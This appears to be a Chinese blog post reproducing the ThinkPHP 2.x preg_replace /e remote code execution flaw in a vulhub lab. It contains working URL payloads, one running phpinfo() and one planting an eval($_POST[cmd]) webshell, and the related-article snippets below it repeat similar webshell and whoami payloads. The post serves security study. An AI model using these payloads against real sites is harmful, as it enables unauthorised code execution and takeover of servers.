ThinkPHP 2.x 任意代码执行漏洞复现

最新推荐文章于 2023-07-06 10:47:34 发布
最新推荐文章于 2023-07-06 10:47:34 发布
阅读量785 收藏 2
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51283052/article/details/130233572
版权

复现环境

攻击机:win11

靶机:kali搭建的vulhub

ThinkPHP影响版本

Thinkphp2.x

原理简介

首先了解这个preg_replace()函数:执行一个正则表达式的搜索和替换。

简单来说可以这么理解preg_replace('正则规则','替换字符','目标字符')

若目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞。

e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行;

/e 可执行模式,此为PHP专有参数,例如preg_replace函数。

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$ preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e','$var[\'\\1\']="\\2";',implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞

复现过程

(1)访问用kali的docker启动的环境 目标机的ip加上端口 例如:192.168.179.140:8080

 

(2)使用在URL后面加上不存在的路径报错爆处Thinkphp版本,或者看数据包

  

(3) 构造payload实现 phpinfo()和webshell

payload1:http://xx.xx.xx.xx:8080/index.php?s=/index/index/xxx/${@phpinfo()} 

payload2:http://xx.xx.xx.xx.:8080/?s=/Index/index/xxx/${@print(eval($_POST[cmd]))}

${}讲解,在PHP当中,${}可以构造一个变量,{}写的是一般的字符,那么就会被当成变量,比如${x}等价于$x,那如果{}写的是函数名称,那么这个函数就会被执行; 

 

 

 

 (4) 用蚁剑连接后门,获得网站权限

 

(5)个人复现记录,如有错误,欢迎指正

LMsec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3787
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
thinkphp系列vulhub所有漏洞复现ThinkPHP 2.x 任意代码执行漏洞ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
最新发布
qq_47289634的博客
07-06 349
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞
thinkphp 2.x 任意代码执行
qq_41048303的博客
12-16 1770
thinkphp 2.x任意代码执行 1.漏洞概述 ​ ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); ​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 2.环境搭
php漏洞2019,2019-11-14:ThinkPHP 2.x 任意代码执行漏洞复现
weixin_35794740的博客
03-24 228
*文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)...
Source file system should be “file“ if “local“ is specified
qq_37163925的博客
07-11 2295
问题描述 使用windows系统上传文件时遇到了这个问题,上传文件的语句没有问题,也加了local,但是无法上传文件到hive,测试了一下,可以上传文件到HDFS中,但是一旦要上传到Hive中就报这个错误:Source file system should be "file" if "local" is specified 解决办法 使用linux系统上传。 ...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp2.1爆出重大安全漏洞
weixin_34261739的博客
04-01 540
thinkphp 2.1的版本 我们来分析下漏洞吧 官方发布了一个安全补丁 表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 官方的补丁: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php   125 –$res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'/]+)@e’, ‘$var['\1']...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp漏洞总结
bhegi_seg的博客
07-31 1044
thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5的漏洞。...
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1265
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
thinkphp路由index.php,ThinkPHP 2.0 泛路由使用详解(2.0 版本适用)
weixin_30704893的博客
03-20 281
提示本部分内容适用于 ThinkPHP V2.0版本,在 3.0 版本中,泛路由已经变更为正则路由。如果您需要了解其他版本的路由,请参考:ThinkPHP URL 泛路由泛路由指的是对同一个路由名称提供了多个规则的支持,使得 URL 的设置更加灵活。例如:http://www.5idev.com/index.php/product/123 这样的 URL 地址,实际访问的地址是 http://ww...
thinkphp任意代码执行漏洞
cnbird's blog
05-16 9921
http://site.com/index.php/module/action/param1/${@phpinfo()} 直接拿SHELL index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c
ThinkPHP漏洞总结(利用)
热门推荐
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
ThinkPHP漏洞总结
文公子的博客
11-03 2748
ThinkPHP漏洞总结 ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。 0x00前言 本篇文章将针对ThinkPHP的历史漏洞进行整理复现,今后爆出的ThinkPHP漏洞,也将进行补充更新。 0x01ThinkPHP远程命令执行/代码执行漏洞 一,ThinkPHP
thinkphp 2.x 任意代码执行漏洞
06-28
这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值